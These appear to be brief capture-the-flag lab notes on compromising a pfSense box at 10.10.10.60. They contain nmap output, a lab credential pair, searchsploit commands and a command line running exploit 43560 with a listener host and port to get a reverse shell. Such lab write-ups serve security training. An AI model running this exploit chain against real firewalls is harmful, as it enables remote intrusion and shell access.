10.10.10.60
└─$ nmap -A 10.10.10.60 -p 1-65535 -T5 -Pn
Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-15 17:37 CEST
Stats: 0:00:52 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 66.86% done; ETC: 17:38 (0:00:26 remaining)
Nmap scan report for 10.10.10.60
Host is up (0.050s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT    STATE SERVICE  VERSION
80/tcp  open  http     lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Did not follow redirect to https://10.10.10.60/
443/tcp open  ssl/http lighttpd 1.4.35
|_http-title: Login
|_http-server-header: lighttpd/1.4.35
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Not valid before: 2017-10-14T19:21:35
|_Not valid after:  2023-04-06T19:21:35

rohit:pfsense

searchsploit pfsense 2.1.3
searchsploit -m php/webapps/43560.py

 python3 43560.py --rhost 10.10.10.60 --lhost 10.10.14.20 --lport 4444 --username rohit --password pfsense
